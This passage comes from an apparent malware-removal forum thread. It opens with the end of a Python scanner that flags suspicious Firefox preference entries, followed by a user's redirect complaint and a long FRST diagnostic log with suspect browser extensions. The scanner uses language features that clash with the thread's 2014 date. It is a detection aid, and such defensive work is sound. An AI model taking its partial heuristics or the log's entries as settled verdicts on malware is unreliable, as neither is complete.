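user_pref("network.cookie.cookieBehavior", 0);
user_pref("privacy.donottrackheader.enabled", true);
'''


def parse_pref(line: str) -> Optional[Tuple[str, object]]:
    """Return (name, decoded value) for a user_pref line, else None."""
    m = PREF_RE.match(line)
    if not m:
        return None
    name, raw = m.group(1), m.group(2).strip()
    if raw.startswith('"'):
        try:
            value: object = json.loads(raw)  # decodes \" and \\ escapes
        except ValueError:
            value = raw  # non-JSON escape (e.g. \'): keep raw text
    elif raw in ("true", "false"):
        value = raw == "true"
    else:
        try:
            value = int(raw)
        except ValueError:
            value = raw
    return name, value


def suspicious_prefs(prefs_text: str) -> List[Tuple[str, List[str]]]:
    """Scan prefs.js text; return [(pref name, [reasons])] for string
    prefs that contain script fragments or sit under an opaque extension id."""
    hits = []
    for line in prefs_text.splitlines():
        parsed = parse_pref(line)
        if parsed is None:
            continue
        name, value = parsed
        if not isinstance(value, str):
            continue  # booleans and integers cannot carry a script
        reasons = [mk for mk in SCRIPT_MARKERS if mk in value]
        if OPAQUE_EXT_RE.fullmatch(name):
            reasons.append("opaque-extension-id")
        if reasons:
            hits.append((name, reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in suspicious_prefs(SAMPLE_PREFS):
        print(f"{name}: {', '.join(reasons)}")
```

Run it against a real profile by reading prefs.js from the profile directory (the path appears in the DDS and FRST logs above) and passing its text to suspicious_prefs.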


#5 phill!
  • Topic Starter

  • Members
  • 18 posts
  • OFFLINE

Posted 30 September 2014 - 03:38 PM

The computer seems to be running fine, with the exception of odd browser redirects and the "Windows is not genuine" message that pops up every day.

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-09-2014
Ran by Camille (administrator) on HOMEPC on 30-09-2014 15:31:26
Running from C:\Users\Camille\Desktop
Loaded Profile: Camille (Available profiles: Camille)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco Systems\VPN Client\cvpnd.exe
(Juniper Networks, Inc.) C:\Program Files (x86)\Juniper Networks\Common Files\dsNcService.exe
(Sourcefire, Inc.) C:\Program Files\Immunet\3.1.13\sfc.exe
(Immunet) C:\Program Files\Immunet\3.1.13\iptray.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Skype Technologies S.A.) C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Desktop.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Immunet Protect] => C:\Program Files\Immunet\3.1.13\iptray.exe [3232464 2014-09-03] (Immunet)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKLM - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {872E3F13-5682-407C-916D-A06C2195FC62} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKCU - {872E3F13-5682-407C-916D-A06C2195FC62} URL = 
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Skype add-on for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {5BED3930-2E9E-76D8-BACC-80DF2188D455} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {1239CC52-59EF-4DFA-8C61-90FFA846DF7E} http://www.musicnotes.com/download/mnviewer.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {3107C2A8-9F0B-4404-A58B-21BD85268FBC} http://www.pogo.com/cdl/launcher/PogoWebLauncherInstaller.CAB
DPF: HKLM-x32 {A8F2B9BD-A6A0-486A-9744-18920D898429} http://www.sibelius.com/download/software/win/ActiveXPlugin.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://games.pogo.com/online2/pogo/bejeweled2/popcaploader_v6.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://hscvpn.uthscsa.edu/dana-cached/sc/JuniperSetupClient.cab
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
 
FireFox:
========
FF ProfilePath: C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default
FF NewTab: hxxp://www.google.com/
FF SelectedSearchEngine: Google
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_224.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Camille\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Extension: Adblock Plus - C:\Users\Camille\AppData\Roaming\Mozilla\Firefox\Profiles\cc3diwjc.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-21]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKCU\...\Firefox\Extensions: [{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}] - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862}
FF Extension: XULRunner - C:\Users\Camille\AppData\Local\{C1D6A6A4-A151-4A29-9D94-0CE53B5BC862} [2011-08-14]
 
Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [penmcajcdddmkfidjjpffbmnjfoofcda] - C:\ProgramData\Codec-V\penmcajcdddmkfidjjpffbmnjfoofcda.crx []
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AeLookupSvc; C:\Windows\System32\aelupsvc.dll [72192 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ALG; C:\Windows\System32\alg.exe [79360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 AppIDSvc; C:\Windows\System32\appidsvc.dll [32256 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Appinfo; C:\Windows\System32\appinfo.dll [70144 2013-02-27] (Microsoft Corporation) [File not signed]
R2 AudioEndpointBuilder; C:\Windows\System32\Audiosrv.dll [679424 2010-11-20] (Microsoft Corporation) [File not signed]
R2 AudioSrv; C:\Windows\System32\Audiosrv.dll [679424 2010-11-20] (Microsoft Corporation) [File not signed]
S3 AxInstSV; C:\Windows\System32\AxInstSV.dll [114688 2010-11-20] (Microsoft Corporation) [File not signed]
S3 BDESVC; C:\Windows\System32\bdesvc.dll [100864 2009-07-13] (Microsoft Corporation) [File not signed]
R2 BFE; C:\Windows\System32\bfe.dll [705024 2010-11-20] (Microsoft Corporation) [File not signed]
R2 BITS; C:\Windows\System32\qmgr.dll [849920 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Browser; C:\Windows\System32\browser.dll [136704 2012-07-04] (Microsoft Corporation) [File not signed]
S3 bthserv; C:\Windows\system32\bthserv.dll [83968 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CertPropSvc; C:\Windows\System32\certprop.dll [80384 2010-11-20] (Microsoft Corporation) [File not signed]
S3 COMSysApp; C:\Windows\system32\dllhost.exe [9728 2009-07-13] (Microsoft Corporation) [File not signed]
S3 COMSysApp; C:\Windows\SysWOW64\dllhost.exe [7168 2009-07-13] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\Windows\system32\cryptsvc.dll [184320 2013-07-09] (Microsoft Corporation) [File not signed]
R2 CryptSvc; C:\Windows\SysWOW64\cryptsvc.dll [140288 2013-07-08] (Microsoft Corporation) [File not signed]
R2 DcomLaunch; C:\Windows\system32\rpcss.dll [512000 2010-11-20] (Microsoft Corporation) [File not signed]
S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Dhcp; C:\Windows\system32\dhcpcore.dll [317952 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Dhcp; C:\Windows\SysWOW64\dhcpcore.dll [254464 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Dnscache; C:\Windows\System32\dnsrslvr.dll [183296 2011-03-03] (Microsoft Corporation) [File not signed]
S3 dot3svc; C:\Windows\System32\dot3svc.dll [252416 2010-11-20] (Microsoft Corporation) [File not signed]
R2 DPS; C:\Windows\system32\dps.dll [162816 2010-11-20] (Microsoft Corporation) [File not signed]
S3 EapHost; C:\Windows\System32\eapsvc.dll [111104 2009-07-13] (Microsoft Corporation) [File not signed]
S3 EFS; C:\Windows\System32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 ehRecvr; C:\Windows\ehome\ehRecvr.exe [696832 2010-11-20] (Microsoft Corporation) [File not signed]
S3 ehSched; C:\Windows\ehome\ehsched.exe [127488 2009-07-13] (Microsoft Corporation) [File not signed]
R2 eventlog; C:\Windows\System32\wevtsvc.dll [1646080 2010-11-20] (Microsoft Corporation) [File not signed]
R2 EventSystem; C:\Windows\system32\es.dll [402944 2009-07-13] (Microsoft Corporation) [File not signed]
R2 EventSystem; C:\Windows\SysWOW64\es.dll [271360 2009-07-13] (Microsoft Corporation) [File not signed]
S3 Fax; C:\Windows\system32\fxssvc.exe [689152 2010-11-20] (Microsoft Corporation) [File not signed]
R3 fdPHost; C:\Windows\system32\fdPHost.dll [16384 2009-07-13] (Microsoft Corporation) [File not signed]
R3 FDResPub; C:\Windows\system32\fdrespub.dll [34816 2009-07-13] (Microsoft Corporation) [File not signed]
R2 FontCache; C:\Windows\system32\FntCache.dll [1175552 2013-01-13] (Microsoft Corporation) [File not signed]
R2 gpsvc; C:\Windows\System32\gpsvc.dll [777728 2010-11-20] (Microsoft Corporation) [File not signed]
R3 hidserv; C:\Windows\System32\hidserv.dll [38912 2009-07-13] (Microsoft Corporation) [File not signed]
R3 hidserv; C:\Windows\SysWOW64\hidserv.dll [49152 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hkmsvc; C:\Windows\system32\kmsvc.dll [90624 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupListener; C:\Windows\system32\ListSvc.dll [232448 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\system32\provsvc.dll [187904 2010-11-20] (Microsoft Corporation) [File not signed]
R3 HomeGroupProvider; C:\Windows\SysWOW64\provsvc.dll [165376 2010-11-20] (Microsoft Corporation) [File not signed]
S3 IEEtwCollectorService; C:\Windows\system32\IEEtwCollector.exe [111616 2014-07-25] (Microsoft Corporation) [File not signed]
R2 IKEEXT; C:\Windows\System32\ikeext.dll [859648 2013-10-11] (Microsoft Corporation) [File not signed]
R2 ImmunetProtect; C:\Program Files\Immunet\3.1.13\sfc.exe [546208 2014-09-03] (Sourcefire, Inc.)
S3 IPBusEnum; C:\Windows\system32\ipbusenum.dll [101888 2009-07-13] (Microsoft Corporation) [File not signed]
S3 KeyIso; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 KtmRm; C:\Windows\system32\msdtckrm.dll [368640 2009-07-13] (Microsoft Corporation) [File not signed]
R2 LanmanServer; C:\Windows\System32\srvsvc.dll [236032 2010-11-20] (Microsoft Corporation) [File not signed]
R2 LanmanWorkstation; C:\Windows\System32\wkssvc.dll [118784 2010-11-20] (Microsoft Corporation) [File not signed]
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-05-18] (Hewlett-Packard Company) [File not signed]
S3 lltdsvc; C:\Windows\System32\lltdsvc.dll [300032 2009-07-13] (Microsoft Corporation) [File not signed]
R2 lmhosts; C:\Windows\System32\lmhsvc.dll [23552 2009-07-13] (Microsoft Corporation) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 Mcx2Svc; C:\Windows\system32\Mcx2Svc.dll [84992 2010-11-20] (Microsoft Corporation) [File not signed]
R2 MMCSS; C:\Windows\system32\mmcss.dll [67584 2009-07-13] (Microsoft Corporation) [File not signed]
R2 MpsSvc; C:\Windows\system32\mpssvc.dll [828416 2010-11-20] (Microsoft Corporation) [File not signed]
S3 MSDTC; C:\Windows\System32\msdtc.exe [141824 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MSiSCSI; C:\Windows\system32\iscsiexe.dll [156672 2009-07-13] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\Windows\System32\msiexec.exe [128000 2010-11-20] (Microsoft Corporation) [File not signed]
S3 msiserver; C:\Windows\SysWOW64\msiexec.exe [73216 2010-11-20] (Microsoft Corporation) [File not signed]
S2 MsMpSvc; c:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2011-04-27] (Microsoft Corporation)
S3 napagent; C:\Windows\system32\qagentRT.dll [476160 2010-11-20] (Microsoft Corporation) [File not signed]
S3 Netlogon; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
R3 Netman; C:\Windows\System32\netman.dll [360448 2009-07-13] (Microsoft Corporation) [File not signed]
R3 netprofm; C:\Windows\System32\netprofm.dll [459776 2009-07-13] (Microsoft Corporation) [File not signed]
R3 netprofm; C:\Windows\SysWOW64\netprofm.dll [360448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [288272 2011-04-27] (Microsoft Corporation)
R2 NlaSvc; C:\Windows\System32\nlasvc.dll [303104 2012-10-03] (Microsoft Corporation) [File not signed]
R2 nsi; C:\Windows\system32\nsisvc.dll [25600 2009-07-13] (Microsoft Corporation) [File not signed]
R3 p2pimsvc; C:\Windows\system32\pnrpsvc.dll [327168 2009-07-13] (Microsoft Corporation) [File not signed]
R3 p2psvc; C:\Windows\system32\p2psvc.dll [438784 2009-07-13] (Microsoft Corporation) [File not signed]
R2 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] () [File not signed]
R2 PcaSvc; C:\Windows\System32\pcasvc.dll [186368 2009-07-13] (Microsoft Corporation) [File not signed]
S3 PerfHost; C:\Windows\SysWow64\perfhost.exe [20992 2009-07-13] (Microsoft Corporation) [File not signed]
S3 pla; C:\Windows\system32\pla.dll [1389056 2010-11-20] (Microsoft Corporation) [File not signed]
S3 pla; C:\Windows\SysWOW64\pla.dll [1508864 2010-11-20] (Microsoft Corporation) [File not signed]
R2 PlugPlay; C:\Windows\system32\umpnpmgr.dll [404480 2011-05-24] (Microsoft Corporation) [File not signed]
S3 PNRPAutoReg; C:\Windows\system32\pnrpauto.dll [25088 2009-07-13] (Microsoft Corporation) [File not signed]
R3 PNRPsvc; C:\Windows\system32\pnrpsvc.dll [327168 2009-07-13] (Microsoft Corporation) [File not signed]
S3 PolicyAgent; C:\Windows\System32\ipsecsvc.dll [501248 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Power; C:\Windows\system32\umpo.dll [163840 2009-07-13] (Microsoft Corporation) [File not signed]
R2 ProfSvc; C:\Windows\system32\profsvc.dll [209920 2012-05-01] (Microsoft Corporation) [File not signed]
S3 ProtectedStorage; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 QWAVE; C:\Windows\system32\qwave.dll [242688 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RasAuto; C:\Windows\System32\rasauto.dll [99328 2009-07-13] (Microsoft Corporation) [File not signed]
R3 RasMan; C:\Windows\System32\rasmans.dll [344064 2010-11-20] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\Windows\System32\mprdim.dll [97792 2009-07-13] (Microsoft Corporation) [File not signed]
S4 RemoteAccess; C:\Windows\SysWOW64\mprdim.dll [75264 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RemoteRegistry; C:\Windows\system32\regsvc.dll [159232 2009-07-13] (Microsoft Corporation) [File not signed]
R2 RpcEptMapper; C:\Windows\System32\RpcEpMap.dll [67072 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RpcLocator; C:\Windows\system32\locator.exe [10240 2009-07-13] (Microsoft Corporation) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [512000 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SamSs; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 scan; C:\Program Files\Immunet\tetra\scan.dll [447744 2014-09-03] (BitDefender)
S3 SCardSvr; C:\Windows\System32\SCardSvr.dll [190976 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Schedule; C:\Windows\system32\schedsvc.dll [1110016 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SCPolicySvc; C:\Windows\System32\certprop.dll [80384 2010-11-20] (Microsoft Corporation) [File not signed]
R3 SDRSVC; C:\Windows\System32\SDRSVC.dll [170496 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 seclogon; C:\Windows\system32\seclogon.dll [30720 2010-11-20] (Microsoft Corporation) [File not signed]
R2 SENS; C:\Windows\System32\sens.dll [64512 2009-07-13] (Microsoft Corporation) [File not signed]
R2 SENS; C:\Windows\SysWOW64\sens.dll [49664 2009-07-13] (Microsoft Corporation) [File not signed]
S3 SensrSvc; C:\Windows\system32\sensrsvc.dll [29184 2009-07-13] (Microsoft Corporation) [File not signed]
S3 SessionEnv; C:\Windows\system32\sessenv.dll [121856 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SessionEnv; C:\Windows\SysWOW64\sessenv.dll [113664 2010-11-20] (Microsoft Corporation) [File not signed]
S2 SharedAccess; C:\Windows\System32\ipnathlp.dll [359424 2009-07-13] (Microsoft Corporation) [File not signed]
R2 ShellHWDetection; C:\Windows\System32\shsvcs.dll [370688 2010-11-20] (Microsoft Corporation) [File not signed]
R2 ShellHWDetection; C:\Windows\SysWOW64\shsvcs.dll [328192 2010-11-20] (Microsoft Corporation) [File not signed]
S3 SNMPTRAP; C:\Windows\System32\snmptrap.exe [14336 2009-07-13] (Microsoft Corporation) [File not signed]
R2 Spooler; C:\Windows\System32\spoolsv.exe [559104 2012-02-11] (Microsoft Corporation) [File not signed]
R2 sppsvc; C:\Windows\system32\sppsvc.exe [3524608 2010-11-20] (Microsoft Corporation) [File not signed]
S3 sppuinotify; C:\Windows\system32\sppuinotify.dll [65536 2009-07-13] (Microsoft Corporation) [File not signed]
R3 SSDPSRV; C:\Windows\System32\ssdpsrv.dll [193024 2009-07-13] (Microsoft Corporation) [File not signed]
R3 SstpSvc; C:\Windows\system32\sstpsvc.dll [75264 2009-07-13] (Microsoft Corporation) [File not signed]
R2 stisvc; C:\Windows\System32\wiaservc.dll [580096 2010-11-20] (Microsoft Corporation) [File not signed]
S3 swprv; C:\Windows\System32\swprv.dll [524288 2009-07-13] (Microsoft Corporation) [File not signed]
R2 SysMain; C:\Windows\system32\sysmain.dll [1743360 2010-11-20] (Microsoft Corporation) [File not signed]
S3 TabletInputService; C:\Windows\System32\TabSvc.dll [92672 2010-11-20] (Microsoft Corporation) [File not signed]
R3 TapiSrv; C:\Windows\System32\tapisrv.dll [316928 2010-11-20] (Microsoft Corporation) [File not signed]
R3 TapiSrv; C:\Windows\SysWOW64\tapisrv.dll [242176 2010-11-20] (Microsoft Corporation) [File not signed]
S3 TBS; C:\Windows\System32\tbssvc.dll [65536 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TermService; C:\Windows\System32\termsrv.dll [680960 2010-11-20] (Microsoft Corporation) [File not signed]
R2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-13] (Microsoft Corporation) [File not signed]
S3 THREADORDER; C:\Windows\system32\mmcss.dll [67584 2009-07-13] (Microsoft Corporation) [File not signed]
R2 TrkWks; C:\Windows\System32\trkwks.dll [119808 2009-07-13] (Microsoft Corporation) [File not signed]
S3 TrustedInstaller; C:\Windows\servicing\TrustedInstaller.exe [194048 2010-11-20] (Microsoft Corporation) [File not signed]
S3 UI0Detect; C:\Windows\system32\UI0Detect.exe [40960 2009-07-13] (Microsoft Corporation) [File not signed]
R3 upnphost; C:\Windows\System32\upnphost.dll [353792 2009-07-13] (Microsoft Corporation) [File not signed]
R3 upnphost; C:\Windows\SysWOW64\upnphost.dll [266752 2009-07-13] (Microsoft Corporation) [File not signed]
R2 UxSms; C:\Windows\System32\uxsms.dll [38912 2009-07-13] (Microsoft Corporation) [File not signed]
S3 VaultSvc; C:\Windows\system32\lsass.exe [31232 2014-04-11] (Microsoft Corporation) [File not signed]
S3 vds; C:\Windows\System32\vds.exe [533504 2010-11-20] (Microsoft Corporation) [File not signed]
S3 VSS; C:\Windows\system32\vssvc.exe [1600512 2010-11-20] (Microsoft Corporation) [File not signed]
S3 W32Time; C:\Windows\system32\w32time.dll [381952 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wbengine; C:\Windows\system32\wbengine.exe [1504256 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WbioSrvc; C:\Windows\System32\wbiosrvc.dll [202240 2009-07-13] (Microsoft Corporation) [File not signed]
S3 wcncsvc; C:\Windows\System32\wcncsvc.dll [367104 2010-11-20] (Microsoft Corporation) [File not signed]
S3 wcncsvc; C:\Windows\SysWOW64\wcncsvc.dll [276992 2010-11-20] (Microsoft Corporation) [File not signed]
S3 WcsPlugInService; C:\Windows\System32\WcsPlugInService.dll [40960 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WcsPlugInService; C:\Windows\SysWOW64\WcsPlugInService.dll [32768 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiServiceHost; C:\Windows\system32\wdi.dll [90624 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiServiceHost; C:\Windows\SysWOW64\wdi.dll [76288 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiSystemHost; C:\Windows\system32\wdi.dll [90624 2009-07-13] (Microsoft Corporation) [File not signed]
R3 WdiSystemHost; C:\Windows\SysWOW64\wdi.dll [76288 2009-07-13] (Microsoft Corporation) [File not signed]
S3 WebClient; C:\Windows\System32\webclnt.dll [259584 2013-07-04] (Microsoft Corporation) [File not signed]
S3 WebClient; C:\Windows\SysWOW64\webclnt.dll [205824 2013-07-04] (Microsoft Corporation) [File not signed]
